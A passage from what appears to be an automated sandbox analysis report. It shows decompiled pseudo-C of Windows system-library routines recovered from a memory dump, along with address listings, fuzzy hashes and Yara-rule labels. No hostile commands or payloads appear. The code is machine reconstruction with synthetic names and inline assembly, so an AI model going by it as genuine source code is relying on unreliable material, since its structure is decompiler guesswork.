														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E015D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E015EEB70(1, 0x16c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E015EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016195D0();
																			L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0161B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01613D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0161B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x015f4128
0x015f4135
0x015f413c
0x015f4141
0x015f4145
0x015f4147
0x015f414e
0x015f4151
0x015f4159
0x015f415c
0x015f4160
0x015f4164
0x015f4168
0x015f416c
0x015f417f
0x015f4181
0x015f446a
0x015f446a
0x015f418c
0x015f4195
0x015f4199
0x015f4432
0x015f4439
0x015f443d
0x015f4442
0x015f4447
0x00000000
0x015f419f
0x015f41a3
0x015f41b1
0x015f41b9
0x015f41bd
0x015f45db
0x015f45db
0x00000000
0x015f41c3
0x015f41c3
0x015f41ce
0x015f41d4
0x0163e138
0x0163e13e
0x0163e169
0x0163e16d
0x0163e19e
0x0163e16f
0x0163e16f
0x0163e175
0x0163e179
0x0163e18f
0x0163e193
0x00000000
0x0163e199
0x00000000
0x0163e199
0x0163e193
0x00000000
0x00000000
0x00000000
0x015f41da
0x015f41da
0x015f41df
0x015f41e4
0x015f41ec
0x015f4203
0x015f4207
0x0163e1fd
0x015f4222
0x015f4226
0x0163e1f3
0x0163e1f3
0x015f422c
0x015f422c
0x015f4233
0x0163e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x015f4239
0x015f4239
0x015f4239
0x015f4239
0x015f4233
0x015f4226
0x015f41ee
0x015f41ee
0x015f41f4
0x015f4575
0x0163e1b1
0x0163e1b1
0x00000000
0x015f457b
0x015f457b
0x015f4582
0x0163e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x015f4588
0x015f4588
0x015f458c
0x0163e1c4
0x0163e1c4
0x00000000
0x015f4592
0x015f4592
0x015f4599
0x0163e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x015f459f
0x015f459f
0x015f45a3
0x0163e1d7
0x0163e1e4
0x00000000
0x015f45a9
0x015f45a9
0x015f45b0
0x0163e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x015f45b6
0x015f45b6
0x015f45b6
0x00000000
0x015f45b6
0x015f45b0
0x015f45a3
0x015f4599
0x015f458c
0x015f4582
0x00000000
0x00000000
0x00000000
0x00000000
0x015f41f4
0x015f423e
0x015f4241
0x015f45c0
0x015f45c4
0x00000000
0x015f45ca
0x015f45ca
0x00000000
0x0163e207
0x0163e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x015f45d1
0x00000000
0x00000000
0x015f45ca
0x00000000
0x015f4247
0x015f4247
0x015f4247
0x015f4249
0x015f4249
0x015f4249
0x015f4251
0x015f4251
0x015f4257
0x015f425f
0x015f426e
0x015f4270
0x015f427a
0x0163e219
0x0163e219
0x015f4280
0x015f4282
0x015f4456
0x015f45ea
0x00000000
0x015f45f0
0x0163e223
0x00000000
0x0163e223
0x015f445c
0x015f445c
0x00000000
0x015f445c
0x00000000
0x015f4288
0x015f428c
0x0163e298
0x015f4292
0x015f4292
0x015f429e
0x015f42a3
0x015f42a7
0x015f42ac
0x0163e22d
0x015f42b2
0x015f42b2
0x015f42b9
0x015f42bc
0x015f42c2
0x015f42ca
0x015f42cd
0x015f42cd
0x015f42d4
0x015f433f
0x015f433f
0x015f42d6
0x015f42d6
0x015f42d9
0x015f42dd
0x015f42eb
0x0163e23a
0x015f42f1
0x015f4305
0x015f430d
0x015f4315
0x015f4318
0x015f431f
0x015f4322
0x015f432e
0x015f433b
0x015f433b
0x00000000
0x015f432e
0x015f42eb
0x015f434c
0x015f434e
0x015f4352
0x015f4359
0x015f435e
0x015f4361
0x015f436e
0x015f438a
0x015f438e
0x015f4396
0x015f439e
0x015f43a1
0x015f43ad
0x015f43bb
0x015f43bb
0x015f43ad
0x015f436e
0x015f43bf
0x015f43c5
0x015f4463
0x015f4463
0x015f43ce
0x015f43d5
0x015f43d9
0x015f43df
0x015f4475
0x015f4479
0x015f4491
0x015f4491
0x015f4479
0x015f43e5
0x015f43eb
0x015f43f4
0x015f43f6
0x015f43f9
0x015f43fc
0x015f43ff
0x015f44e8
0x015f44ed
0x015f44f3
0x0163e247
0x00000000
0x015f44f9
0x015f4504
0x015f4508
0x015f450f
0x0163e269
0x00000000
0x015f4515
0x015f4519
0x015f4531
0x015f4534
0x015f4537
0x015f453e
0x015f4541
0x015f454a
0x0163e255
0x0163e255
0x0163e25b
0x0163e25e
0x0163e261
0x0163e261
0x015f4555
0x015f4559
0x015f455d
0x0163e26d
0x0163e270
0x0163e274
0x0163e27a
0x0163e27d
0x0163e28e
0x0163e28e
0x015f4563
0x015f4563
0x015f4569
0x015f4569
0x00000000
0x015f455d
0x015f450f
0x00000000
0x015f44f3
0x015f43ff
0x015f4405
0x015f4405
0x015f4405
0x015f42ac
0x015f428c
0x015f4282
0x015f4407
0x015f440d
0x0163e2af
0x0163e2af
0x015f4413
0x015f4413
0x00000000
0x015f41d4
0x00000000
0x015f41c3
0x015f41bd
0x015f4415
0x015f4415
0x015f4416
0x015f4417
0x015f4429
0x015f416e
0x015f416e
0x015f4175
0x015f4498
0x015f449f
0x0163e12d
0x00000000
0x0163e133
0x00000000
0x0163e133
0x015f44a5
0x015f44a5
0x015f44aa
0x00000000
0x015f44bb
0x015f44ca
0x015f44d6
0x015f44d7
0x015f44d8
0x015f44e3
0x015f44e3
0x015f44aa
0x015f417b
0x015f417b
0x015f417b
0x00000000
0x015f417b
0x015f4175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f46d8f8e73f2a4186d94cdb0ffef5b14aba72ad5b915edaee8dce0111ad5da
Instruction ID: 22960aa4fd94a78b41131447e8a3b083e56ca6a77391c03b79a51c049bbdc9df
Opcode Fuzzy Hash: 77f46d8f8e73f2a4186d94cdb0ffef5b14aba72ad5b915edaee8dce0111ad5da
Instruction Fuzzy Hash: 42F169746082118BD724DF59C884A7BBBE1FF98714F04892EFA96CB390E735D885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016020A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E016020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x16c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01602EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01602EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E015D58EC(_t240);
									_t221 =  *0x16c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x16c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01614A2C(0x16c6e40, 0x1614b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E015F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x15b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0160F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0160F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01657016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L015F2400(_t267 + 0x20);
															}
															L015F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01602397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E015F2280(_t134, 0x16c8608);
									__eflags =  *0x16c6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E015EFFB0(_t198, _t241, 0x16c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x16c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x16c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01606B90(_t210,  &_v64);
										_t262 =  *0x16c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0160E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E016197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0161006A(0x16c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x16c8608);
												E0161B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x16c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x16c6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E015EFFB0(_t198, _t240, 0x16c8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E016100C2(0x16c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x016020a0
0x016020a8
0x016020ad
0x016020b3
0x016020b8
0x016020c2
0x016020c7
0x016020cb
0x016020d2
0x01602263
0x01602266
0x01645836
0x01645836
0x00000000
0x0160226c
0x0160226c
0x01602270
0x01602274
0x016020e2
0x016020e2
0x016020e6
0x016020ee
0x016457dc
0x016457de
0x016457ec
0x016457ec
0x016457f1
0x016457f3
0x016457f8
0x00000000
0x016457f8
0x016457e0
0x016457e4
0x016457ea
0x00000000
0x00000000
0x00000000
0x016457ea
0x016020f4
0x016020f4
0x016020f8
0x016020f8
0x016020fc
0x01602100
0x01602106
0x01602201
0x01602206
0x0160220b
0x0160220e
0x016022a9
0x016022ac
0x00000000
0x00000000
0x016022b2
0x016022b5
0x01645801
0x01645806
0x00000000
0x00000000
0x01645810
0x01645815
0x01645818
0x00000000
0x00000000
0x0164581e
0x016022bb
0x016022bb
0x01602218
0x01602218
0x0160221c
0x01602220
0x01602222
0x016022c2
0x016022c4
0x016022dc
0x016022dc
0x016022e1
0x00000000
0x00000000
0x00000000
0x016022e7
0x016022c8
0x016022cd
0x016022d3
0x016022d6
0x01645823
0x01645825
0x01645827
0x00000000
0x00000000
0x0164582d
0x00000000
0x0164582d
0x00000000
0x01602228
0x01602228
0x00000000
0x01602228
0x01602222
0x01602214
0x01602214
0x00000000
0x01602114
0x01602114
0x01602114
0x0160211a
0x0160211c
0x01602348
0x0160234d
0x01645840
0x01645845
0x01645848
0x0164584e
0x0164584e
0x01645848
0x01602353
0x01602355
0x01602388
0x01602388
0x01602368
0x0160236a
0x0160236c
0x0160238f
0x00000000
0x0160236e
0x0160236e
0x0160218e
0x0160218e
0x01602191
0x01602195
0x01645a03
0x01645a06
0x01645a0c
0x01645a0f
0x01645a11
0x01645a13
0x01645a13
0x01645a19
0x01645a1f
0x00000000
0x0160219b
0x0160219b
0x016021a0
0x01602282
0x01602284
0x01602284
0x01602284
0x01602284
0x016021a6
0x016021a9
0x016021ac
0x016021ae
0x016021b3
0x0160228b
0x01602290
0x01602379
0x01602296
0x01602298
0x01602298
0x01602290
0x016021b9
0x016021be
0x016022a2
0x016022a2
0x016021c4
0x016021c8
0x016021cc
0x016021d0
0x016021d4
0x016021de
0x016021e3
0x01645a29
0x01645a2c
0x00000000
0x00000000
0x01645a3b
0x00000000
0x016021e9
0x016021e9
0x016021e9
0x016021ee
0x016021f1
0x01645a45
0x01645a4b
0x01645a52
0x01645a58
0x01645a5d
0x01645a5f
0x01645a71
0x01645a61
0x01645a6a
0x01645a6a
0x01645a76
0x01645a79
0x01645a7f
0x01645a83
0x01645a85
0x01645a87
0x01645a87
0x01645a8c
0x01645a91
0x01645a97
0x01645a9f
0x01645aa0
0x01645aa1
0x01645aa6
0x01645aab
0x01645ab1
0x01645ab3
0x01645ab9
0x01645aca
0x01645ad4
0x01645ad4
0x01645ade
0x01645ade
0x01645aab
0x01645a79
0x01645a52
0x016021f7
0x016021f9
0x016021fe
0x016021fe
0x016021e3
0x01602195
0x0160236c
0x01602122
0x01602122
0x01602124
0x01602231
0x01602236
0x01602236
0x01602238
0x01602238
0x01602240
0x01602242
0x01602244
0x016459fc
0x0160218c
0x0160218c
0x00000000
0x0160218c
0x0160224a
0x0160224f
0x01602256
0x01602304
0x01602309
0x0160230f
0x0160231e
0x0160231e
0x0160231e
0x01602320
0x01602325
0x0160232a
0x0160232c
0x0160233e
0x0160233e
0x00000000
0x0160232c
0x01602311
0x01602317
0x0160231a
0x0160231c
0x01602380
0x01602380
0x01602380
0x01602384
0x00000000
0x00000000
0x01602386
0x00000000
0x0160231c
0x0160225c
0x0160225c
0x00000000
0x0160225c
0x0160212a
0x01602134
0x01602138
0x0160213d
0x01645858
0x01645863
0x01645863
0x01645867
0x0164586a
0x00000000
0x00000000
0x0164586c
0x0164586c
0x01645871
0x01645875
0x01645877
0x01645997
0x0164599c
0x016459a1
0x016459a7
0x016459a7
0x00000000
0x016459a7
0x0164587d
0x00000000
0x0164588b
0x0164588b
0x01645890
0x01645892
0x01645894
0x01645899
0x0164589b
0x016458a0
0x016458a0
0x016458aa
0x016458b2
0x016458b6
0x016458be
0x016458c6
0x016458c9
0x0164590d
0x01645917
0x0164591a
0x0164591c
0x01645920
0x01645928
0x0164592a
0x0164592c
0x0164592e
0x0164592e
0x016458cb
0x016458cd
0x016458d8
0x016458e0
0x016458f4
0x016458fe
0x016458fe
0x0164593a
0x0164593e
0x01645940
0x01645942
0x00000000
0x01645944
0x01645944
0x01645949
0x0164594e
0x0164594e
0x01645953
0x0164595b
0x01645976
0x01645976
0x0164597a
0x0164597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01645981
0x01645981
0x01645981
0x01645983
0x01645988
0x0164598d
0x01645991
0x01645991
0x00000000
0x0164595d
0x0164595d
0x01645963
0x01645965
0x00000000
0x00000000
0x00000000
0x00000000
0x01645967
0x01645967
0x0164596b
0x0164596d
0x00000000
0x00000000
0x0164596f
0x01645971
0x01645971
0x01645974
0x00000000
0x00000000
0x00000000
0x01645974
0x00000000
0x01645967
0x0164595b
0x01645942
0x01645863
0x01602143
0x01602143
0x01602149
0x0160214f
0x016022f1
0x016022f6
0x00000000
0x01602173
0x01602173
0x0160217d
0x01602181
0x01602186
0x016459ae
0x016459b2
0x016459b5
0x016459b7
0x016459ba
0x016459cd
0x016459d1
0x016459d5
0x016459d9
0x016459db
0x00000000
0x00000000
0x016459dd
0x016459dd
0x016459e1
0x016459e4
0x016459e7
0x016459ee
0x016459ee
0x016459f3
0x016459f3
0x00000000
0x01602186
0x0160214f
0x01602106
0x01602266
0x016020d8
0x016020da
0x016020e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cdab831d6e2bfbdfb29cc4b0d6c293ec0513ac7eabc812fff3f79408224c35e
Instruction ID: 23ae2fa9b6b5b95cc5676977b664fe384f98e520ca8f841b7ad5176daeae360a
Opcode Fuzzy Hash: 9cdab831d6e2bfbdfb29cc4b0d6c293ec0513ac7eabc812fff3f79408224c35e
Instruction Fuzzy Hash: 82F1E1356083429FEB2ACF2CCC5476B7BE6AF85714F08855DEA968B381D774D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 015ED5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E015ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x16cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E015E6600(0x16c52d8);
